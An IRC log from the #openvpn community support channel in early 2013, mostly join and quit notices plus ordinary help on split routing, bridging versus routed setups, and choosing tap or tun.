[rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 22:27 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 22:27 -!- peper [~peper@node.piotrj.org] has joined #openvpn 22:27 -!- ngharo [~ngharo@shepard.sypherz.com] has joined #openvpn 22:27 -!- sitaktif [~sitaktif@kollok.org] has joined #openvpn 22:27 -!- con3x [~pkinnaird@kobol.geeksoc.org] has joined #openvpn 22:27 -!- paccer [uid4847@gateway/web/irccloud.com/x-iggwqzmrrmnhkcai] has joined #openvpn 22:27 -!- kirin` [telex@gateway/shell/anapnea.net/x-uvulotxunalwtwsa] has joined #openvpn 22:27 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 22:27 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has joined #openvpn 22:27 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 22:27 -!- ServerMode/#openvpn [+ooov plaisthos mattock raidz_away hazardous] by calvino.freenode.net 22:27 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn 22:27 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 22:27 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 22:27 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 22:27 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 22:27 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 22:27 -!- fys [~fys@108-65-116-255.lightspeed.austtx.sbcglobal.net] has joined #openvpn 22:27 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 22:27 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 22:27 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 22:27 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 22:27 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 22:27 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 22:27 -!- mjixx [~markus@80.67.14.31] has joined #openvpn 22:27 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 22:27 -!- ServerMode/#openvpn [+o vpnHelper] by calvino.freenode.net 22:27 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 22:27 -!- EvilJStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 22:27 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 22:27 -!- tyteen4a03 [~T4@n218250226180.netvigator.com] has joined #openvpn 22:27 -!- gardar [~gardar@gardar.net] has joined #openvpn 22:27 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 22:27 -!- walp [~nobody@unaffiliated/walp] has joined #openvpn 22:27 -!- master_of_master [~master_of@p57B532CC.dip.t-dialin.net] has joined #openvpn 22:27 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 22:27 -!- folivora [~out@46.19.34.64] has joined #openvpn 22:27 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has joined #openvpn 22:27 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 22:27 -!- thermoman [~thermoman@idle.foobar0815.de] has joined #openvpn 22:27 -!- erry [erry@freenode/staff/erry] has joined #openvpn 22:27 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 22:27 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 22:27 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 22:27 -!- hid3 [~arnoldas@78.157.71.116] has joined #openvpn 22:27 -!- uuuppz_ [uuuppz@78.129.207.46] has joined #openvpn 22:27 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has joined #openvpn 22:27 -!- Rienzilla [rien@sinas.rename-it.nl] has joined #openvpn 22:27 -!- ChauffeR [squirrel@has.a.fluffy.redtail.it] has joined #openvpn 22:27 -!- MorgyN [~mig@island.morgyn.org] has joined #openvpn 22:27 -!- inimino [~inimino@oftn/board/inimino] has joined #openvpn 22:27 -!- thumbs [1000@unaffiliated/thumbs] has joined #openvpn 22:27 -!- kjs [kjs@fedora/kjs] has joined #openvpn 22:27 -!- js_ [~js@li503-152.members.linode.com] has joined #openvpn 22:27 -!- oskie [~usel@h-254-83.a218.priv.bahnhof.se] has joined #openvpn 22:27 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn 22:27 -!- nullsign [~nullsign@daedalus.genom.com] has joined #openvpn 22:27 -!- DaCheat_ [JMark@external.JmarkIT.com] has joined #openvpn 22:27 -!- dvl [~dan@pdpc/supporter/active/dvl] has joined #openvpn 22:27 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has joined #openvpn 22:27 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has joined #openvpn 22:27 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-yssobzmevvtknuoq] has joined #openvpn 22:27 -!- parmegv [U2FsdGVkX1@ma.sdf.org] has joined #openvpn 22:27 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn 22:27 -!- lbft [~lbft@199.195.249.177] has joined #openvpn 22:27 -!- zz_AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 22:27 -!- syzzer [~steffan@50709F7C.static.ziggozakelijk.nl] has joined #openvpn 22:27 -!- colo-work [~jt@78.142.138.4] has joined #openvpn 22:27 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 22:27 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn 22:27 -!- jY [~jy@photoblog.com] has joined #openvpn 22:27 -!- cherwin [~cherwin@ip4da6274e.direct-adsl.nl] has joined #openvpn 22:27 -!- phantomcircuit [~phantomci@covertinferno.org] has joined #openvpn 22:27 -!- ServerMode/#openvpn [+o novaflash] by calvino.freenode.net 22:27 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 22:27 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 22:27 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 22:27 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 22:27 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn 22:27 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 22:27 -!- catsup [~d@64.111.123.163] has joined #openvpn 22:27 -!- cmelbye [~charlie@yourwiki/staff/charlie] has joined #openvpn 22:27 -!- kothog [~kothog@unaffiliated/kothog] has joined #openvpn 22:27 -!- batrick [~batrick@nmap/developer/batrick] has joined #openvpn 22:27 -!- corretico [~luis@190.211.93.38] has joined #openvpn 22:27 -!- kloeri [~kloeri@freenode/staff/exherbo.kloeri] has joined #openvpn 22:27 -!- nameless` [~nameless@u1c.eu] has joined #openvpn 22:27 -!- scoates [~sean@iconoclast.caedmon.net] has joined #openvpn 22:27 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 22:27 -!- rkantos [robin@4e.fi] has joined #openvpn 22:27 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has joined #openvpn 22:27 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 22:27 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn 22:27 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 22:27 -!- p0rk [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has joined #openvpn 22:27 -!- TheLaw [~law@irc.l4w.info] has joined #openvpn 22:27 -!- defswork [~andy@141.0.50.105] has joined #openvpn 22:27 -!- Burgundy [~burgundy@5-12-190-68.residential.rdsnet.ro] has joined #openvpn 22:27 -!- benedikt [~benedikt@unaffiliated/benedikt] has joined #openvpn 22:27 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 22:27 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn 22:27 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 22:27 -!- JyZyXEL [~foo@a88-112-73-201.elisa-laajakaista.fi] has joined #openvpn 22:27 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 22:27 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 22:27 -!- RichardBronosky [~RichardBr@ec2-50-17-28-78.compute-1.amazonaws.com] has joined #openvpn 22:27 -!- uberushaximus [~uberushax@shepard.sypherz.com] has joined #openvpn 22:27 -!- Erawan_RN [~Erawan@unaffiliated/erawanarifnugroh] has joined #openvpn 22:27 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn 22:27 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-jwtrifiamymywmib] has joined #openvpn 22:27 -!- Fiouz_ [~Fiouz@2a01:e0b:1:68:240:63ff:fee6:924b] has joined #openvpn 22:27 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has joined #openvpn 22:27 -!- Martin` [martin@2001:16f8:2:10::215] has joined #openvpn 22:27 -!- Champi [Champi@rootshell.fr] has joined #openvpn 22:27 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 22:27 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has joined #openvpn 22:27 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn 22:27 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn 22:27 -!- nickanderson_afk [~cmdln@ginger.pilgrimpage.com] has joined #openvpn 22:27 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has joined #openvpn 22:27 -!- ServerMode/#openvpn [+o dazo_afk] by calvino.freenode.net 22:27 -!- Pei [pei@2600:3c00::f03c:91ff:feae:5e2d] has joined #openvpn 22:27 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 22:27 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 22:27 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 22:27 -!- echinos_ [~echinos@67.196.136.211] has joined #openvpn 22:27 -!- zamba [marius@flage.org] has joined #openvpn 22:27 -!- Varazir [~mircwars@c-94-255-128-179.cust.bredband2.com] has joined #openvpn 22:27 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 22:27 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 22:27 -!- C-S-B [~C-S-B@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 22:27 -!- fatpony [~fatpony@88-190-211-231.rev.dedibox.fr] has joined #openvpn 22:27 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 22:27 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 22:27 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn 22:28 -!- sauce [sauce@ool-ad02ad20.dyn.optonline.net] has joined #openvpn 22:28 -!- joshie [~josh@75-150-76-129-NewEngland.hfc.comcastbusiness.net] has joined #openvpn 22:28 -!- BtbN [~btbn@btbn.de] has joined #openvpn 22:28 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 22:28 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn 22:28 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 22:28 -!- [fred] [fred@konfuzi.us] has joined #openvpn 22:28 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 22:28 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 22:28 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 22:28 -!- zu [~zu@ks387228.kimsufi.com] has joined #openvpn 22:28 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 22:28 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn 22:28 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn 22:28 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn 22:28 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Excess Flood] 22:28 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn 22:28 -!- pekster [~rewt@cl-466.chi-03.us.sixxs.net] has quit [Changing host] 22:28 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn 22:28 -!- peper [~peper@node.piotrj.org] has quit [Max SendQ exceeded] 22:28 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Excess Flood] 22:28 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn 22:28 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Max SendQ exceeded] 22:28 -!- ppr [~peper@gentoo/developer/peper] has joined #openvpn 22:28 -!- sauce [sauce@ool-ad02ad20.dyn.optonline.net] has quit [Changing host] 22:28 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 22:28 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 22:28 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Changing host] 22:28 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 22:32 -!- kirin` [telex@gateway/shell/anapnea.net/x-uvulotxunalwtwsa] has quit [Ping timeout: 276 seconds] 22:33 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Read error: Connection reset by peer] 22:33 -!- kirin` [telex@gateway/shell/anapnea.net/x-hryuvdfbqaqdnpes] has joined #openvpn 22:33 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 22:35 < nutcase> Is it possible to only send certain traffic over the VPN? 22:36 < pekster> nutcase: Either define routes to specific hosts/networks, or use policy routing to use whatever detection your OS supports to choose the gateway 22:38 < nutcase> hm 22:38 < nutcase> It might just be easier to run a VM for the vpn lol 22:39 < pekster> LARTC's howto can give you an intro to policy routing on Linux. Other OS's have different ways to do that 22:39 -!- kirin` [telex@gateway/shell/anapnea.net/x-hryuvdfbqaqdnpes] has quit [Ping timeout: 255 seconds] 22:40 < pekster> Windows, for instance, doesn't have any support unless you pay for one of their advanced server operating systems ;) 22:40 < pekster> (yes, that's how they "reward" you for buying a $200 Windows 8 Professional edition ;) 22:40 < uberushaximus> I thought it was more than that 22:40 -!- kirin` [telex@gateway/shell/anapnea.net/x-wbaexttbrbduwkdu] has joined #openvpn 22:40 < pekster> That's the US price anyway 22:40 < uberushaximus> isn't that just the core to pro upgrade? 22:41 < pekster> Oh, maybe. I dunno. There was some $40 upgrade deal that ended on 1/31 for XP through Win7 users. I didn't feel like feeding the troll more money for an OS that, under the hood, hasn't really changed since Vista SP1 22:42 < uberushaximus> indeed 22:42 < pekster> They added NFS support, native iso mounting, and stopped a few services from running at boot. But now they need people to upgrade so they can get more support for Metro that they're betting bank on 22:42 < pekster> It's just dumb 22:42 < pekster> Anyway, no policy routing there either, at least not without fancy 3rd party tools 22:42 < pekster> :) 22:46 -!- kirin` [telex@gateway/shell/anapnea.net/x-wbaexttbrbduwkdu] has quit [Ping timeout: 256 seconds] 22:47 -!- kirin` [telex@gateway/shell/anapnea.net/x-chfswjelxyrqjskf] has joined #openvpn 22:48 < Devastator> oh well.. 22:48 < Devastator> time for me to rest.. this thing is driving me nuts heheh 22:53 -!- kirin` [telex@gateway/shell/anapnea.net/x-chfswjelxyrqjskf] has quit [Ping timeout: 264 seconds] 22:54 -!- kirin` [telex@gateway/shell/anapnea.net/x-bycvgppbjdznazft] has joined #openvpn 22:56 < Devastator> at least I think I'm doing the right thing now.. 23:14 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 23:20 -!- sauce [sauce@unaffiliated/sauce] has quit [Ping timeout: 246 seconds] 23:24 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 23:44 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Ping timeout: 240 seconds] 23:50 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn --- Day changed Fri Feb 08 2013 00:11 -!- Matir [~matir@ubuntu/member/matir] has joined #openvpn 01:33 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 245 seconds] 01:34 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 01:37 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 01:57 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:01 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 02:11 -!- kothog [~kothog@unaffiliated/kothog] has quit [Ping timeout: 244 seconds] 02:15 -!- kothog [~kothog@S0106001d7d131fa4.gv.shawcable.net] has joined #openvpn 02:15 -!- kothog [~kothog@S0106001d7d131fa4.gv.shawcable.net] has quit [Changing host] 02:15 -!- kothog [~kothog@unaffiliated/kothog] has joined #openvpn 02:18 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 02:44 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 02:44 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 02:46 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 02:46 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 02:52 -!- zz_AsadH is now known as AsadH 03:18 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 03:22 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 03:23 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 03:33 -!- dazo_afk is now known as dazo 03:38 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 04:35 -!- p3rror [~mezgani@2001:0:53aa:64c:1889:2fc2:d673:9d81] has joined #openvpn 04:38 -!- kothog [~kothog@unaffiliated/kothog] has quit [Read error: Operation timed out] 04:39 -!- kothog [~kothog@S0106001d7d131fa4.gv.shawcable.net] has joined #openvpn 04:39 -!- kothog [~kothog@S0106001d7d131fa4.gv.shawcable.net] has quit [Changing host] 04:39 -!- kothog [~kothog@unaffiliated/kothog] has joined #openvpn 04:53 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 264 seconds] 04:55 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has quit [Read error: Connection reset by peer] 05:01 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 252 seconds] 05:03 -!- AsadH is now known as zz_AsadH 05:14 -!- JyZyXEL [~foo@a88-112-73-201.elisa-laajakaista.fi] has left #openvpn ["WeeChat 0.4.0-dev"] 05:16 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 05:24 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn 05:42 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 260 seconds] 05:44 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 05:44 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 05:53 -!- [Xaronic] is now known as ForkingH1tl3r 06:05 -!- zz_AsadH is now known as AsadH 06:06 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 06:31 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Connection timed out] 06:32 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 06:36 -!- ForkingH1tl3r is now known as [Xaronic] 06:45 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 06:50 -!- p3rror [~mezgani@2001:0:53aa:64c:1889:2fc2:d673:9d81] has quit [Ping timeout: 245 seconds] 06:57 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 07:02 -!- master_of_master [~master_of@p57B532CC.dip.t-dialin.net] has quit [Ping timeout: 245 seconds] 07:03 -!- p3rror [~mezgani@2001:0:53aa:64c:3844:2fc2:d606:77cf] has joined #openvpn 07:04 -!- master_of_master [~master_of@p57B520BD.dip.t-dialin.net] has joined #openvpn 07:30 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 07:31 -!- [Xaronic] is now known as Sp00n 07:31 -!- Sp00n [~Xaronic]@occupyuk.co.uk] has quit [Disconnected by services] 07:31 -!- [Xaronic] [~Xaronic]@occupyuk.co.uk] has joined #openvpn 07:36 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 07:36 -!- Holiday [~rjr162@128.118.15.39] has joined #openvpn 07:37 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 07:42 < Holiday> quick question... I'm doing tap mode and setting up a the ethernet bridge via a bash script.. the br0 address is the same as the physical ethernet device, but the tap0 doesn't only lists an ipv6 address.. should it also have an IP/gateway/etc or does that appear when someone connects? 07:44 <@plaisthos> when using bridges only the bridge should have ip addresse, the members should have none 07:45 < Holiday> okay sweet. I wanted to double check before I proceeded with the test 07:48 -!- Holiday [~rjr162@128.118.15.39] has quit [Read error: Connection reset by peer] 07:48 -!- Holiday [~rjr162@128.118.15.39] has joined #openvpn 07:49 <@dazo> Holiday: why do you bridge? 07:50 -!- dazo changed the topic of #openvpn to: OpenVPN Community Support Channel || PLEASE read entire topic || OpenVPN RELEASED FOR ANDROID! || Current Release: 2.3.0 (08-Jan-2013) || First time? Use !welcome and !goal || Access-Server? /join #openvpn-as || We're not psychic - please !paste your !configs and !logs and a description of the issue || Bridging? Yes, we will ask you why you do that many times! || Your problem is probably 07:51 < havoc> dazo: looks like topic got truncated 07:51 <@dazo> crap! 07:51 < havoc> ending with: "...|| Your problem is probably" 07:51 -!- dazo changed the topic of #openvpn to: OpenVPN Community Support Channel || PLEASE read entire topic || OpenVPN RELEASED FOR ANDROID! || Current Release: 2.3.0 (08-Jan-2013) || First time? Use !welcome and !goal || Access-Server? /join #openvpn-as || We're not psychic - please !paste your !configs and !logs and a description of the issue || Your problem is probably firewall, Really ||Not a native English speaker? say so! 07:52 -!- dazo changed the topic of #openvpn to: OpenVPN Community Support Channel || PLEASE read entire topic || OpenVPN RELEASED FOR ANDROID! || Current Release: 2.3.0 (08-Jan-2013) || First time? Use !welcome and !goal || Access-Server? /join #openvpn-as || We're not psychic - please !paste your !configs and !logs and a description of the issue || Your problem is probably firewall, Really ||Not a native English speaker? say so! 07:52 <@dazo> could probably just change that truncation to say: Your problem is probably you .... :-P 07:52 < havoc> Did you want a space after the '||' in "||Not a native English speaker?" ? 07:52 < rob0> haha 07:52 -!- Holiday [~rjr162@128.118.15.39] has quit [Read error: Connection reset by peer] 07:52 -!- dazo changed the topic of #openvpn to: OpenVPN Community Support Channel || PLEASE read entire topic || OpenVPN RELEASED FOR ANDROID! || Current Release: 2.3.0 (08-Jan-2013) || First time? Use !welcome and !goal || Access-Server? /join #openvpn-as || We're not psychic - please !paste your !configs and !logs and a description of the issue || Your problem is probably firewall, Really || Not a native English speaker? say so! 07:53 -!- Holiday [~rjr162@128.118.15.39] has joined #openvpn 07:53 < Holiday> Well, I figured that would be the best option for what we're doing (but it may not be) 07:53 < havoc> dazo: :) 07:53 < rob0> !tunortap 07:53 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 07:53 <@dazo> Holiday: why do you think it is the best option? 07:53 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! 07:54 <@plaisthos> dazo: you could add iOS to OpenVPN RELEASED FOR ANDROID! 07:54 <@dazo> plaisthos: nah ... I don't see the source for that one ;-) 07:54 < Holiday> dazo: initially the other guy I'm working with on this was trying to get an IPsec/L2TP vpn going (but that's just a pain in the butt) so I'm trying openvpn and from what I read the tap + bridge may be the best setup 07:55 <@dazo> Holiday: that is not telling my why bridging is best 07:55 < Holiday> dazo: he's trying to keep the clients in an IP range (.127 to .145) that's in the same subnet as the server 07:55 <@dazo> Holiday: why? 07:55 <@plaisthos> dazo: I think the OpenVPN RELEASED FOR ANDROID was added when OpenVPN Connect hit the Play Store ;) 07:55 < Holiday> dazo: he's stubborn and has his reasons lol (plus they're a bit funky about private IP's here) 07:56 <@dazo> Holiday: non-bridge doesn't mean you don't control the VPN IPs 07:56 <@dazo> Holiday: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 07:56 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net) 07:56 < Holiday> dazo: if you think non-bridged would be better, although the other guy doesn't want to use NAT or MASQ.. I'm really hoping for some good insight (I read all 48 pages of the man files and I'm still at this point lol) 07:56 < rob0> The !tunortap factoid gave a little overview of when to use tap. 07:56 <@dazo> Holiday: my policy is that I don't help people with bridges before I get a reasonable explanation why to use bridges 07:57 < havoc> but routing requires cooperation by the guy on the other end, which may or may not be possible? 07:57 <@dazo> that's anyhow a human issue ... not a technical issue ;-) 07:57 < havoc> dazo: but still justification for bridge mode :) 07:58 <@dazo> havoc: not in my book ;-) 07:58 < havoc> dazo: if you don't have control over the remote network, you don't have a choice 07:58 <@dazo> havoc: you have always a choice 07:58 < havoc> I'm not saying that's Holiday's case, I'm just pointing it out 07:59 < havoc> dazo: ...to not do it at all 07:59 < Holiday> dazo: Initially having read that with the IPv6 and same broadcast domain sounded like what he wants (plus we've been big into getting into IPv6 so at *some point* (when everyone else.. ISPs etc catch up) we'll want that) 07:59 <@dazo> Holiday: OpenVPN 2.3 supports IPv6 07:59 <@dazo> in tun 07:59 < Holiday> dazo: but for the time if I can get away non-bridged and it's easier, I'm all for it. At this point I just want this thing up lol 08:00 <@dazo> Holiday: most support cases here which starts with bridging (that's something like 99% of the cases) ends up with having less troubles and an easier config using a routed setup 08:00 < Holiday> dazo: I'll let the other guy know.. he's also a stickler for repo's.. he has to build the packages himself and only did the 2.2.1 because he wasn't sure if 2.3 was 100% yet.. but he's willing to swap that that's not a problem. But minus the IPv6, I should just forgo the bridge 08:01 < Holiday> dazo: so should I stick with tap or go tun if I'm not doing a bridge? 08:01 <@dazo> Holiday: and the biggest issue with bridging is scalability and a massive amount of broadcast traffic which lowers the performance ... 08:01 < havoc> Holiday: bridging is also problematic as it adds another point of failure; the bridge 08:02 <@dazo> Holiday: go for tun ... if you read that wiki page I sent you, it's all explained there 08:02 < Holiday> dazo & havoc: which is what I'm trying to get away from.. just like with the IPsec/L2TP + ppp you have a lot of layers where one incompatibility or whatever makes the whole thing barf 08:02 < havoc> gah, I still have much to convert to TUN :( 08:03 < Holiday> dazo: okay thanks! I'll modify what I have but I'm sure I'll be back with more issues lol (hopefully not though) 08:03 <@dazo> Holiday: if you know network routing .... you'll have solved tun mode easily 08:04 <@dazo> (and it will perform better than tap too) 08:05 <@plaisthos> and mobile phone client don't lack tap at all 08:06 <@dazo> s/n't// ?? 08:07 <@plaisthos> s/lack/like/ 08:07 <@dazo> ahh :) 08:09 <@plaisthos> !learn tunortap as Normal Android/iOS devices (not rooted/jailbroken) support only tun. 08:09 <@vpnHelper> Joo got it. 08:09 <@plaisthos> !tunortap 08:09 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against 08:09 <@vpnHelper> you over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 08:21 -!- y4h0 [~yavor@78.128.23.17] has quit [Ping timeout: 248 seconds] 08:22 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn 08:25 -!- pa__ [~pa@host55-12-dynamic.61-82-r.retail.telecomitalia.it] has joined #openvpn 08:33 -!- niervol [~krystian@193.106.244.150] has quit [Quit: Leaving.] 08:35 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:45 < fys> I officially hate Lousiana. 08:46 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 08:47 < fys> well it'd help if i spelled their shitty state's name right 08:49 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 08:55 -!- p3rror [~mezgani@2001:0:53aa:64c:3844:2fc2:d606:77cf] has quit [Ping timeout: 245 seconds] 08:55 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has joined #openvpn 08:55 -!- ade_b [~Ade@h31-3-227-203.host.redstation.co.uk] has quit [Changing host] 08:55 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:59 -!- pa__ [~pa@host55-12-dynamic.61-82-r.retail.telecomitalia.it] has quit [Ping timeout: 248 seconds] 08:59 < rob0> The Great Firewall of Lousyana? 09:00 <@novaflash> :) 09:00 < fys> lol 09:00 < EugeneKay> Everybody does, fys. 09:00 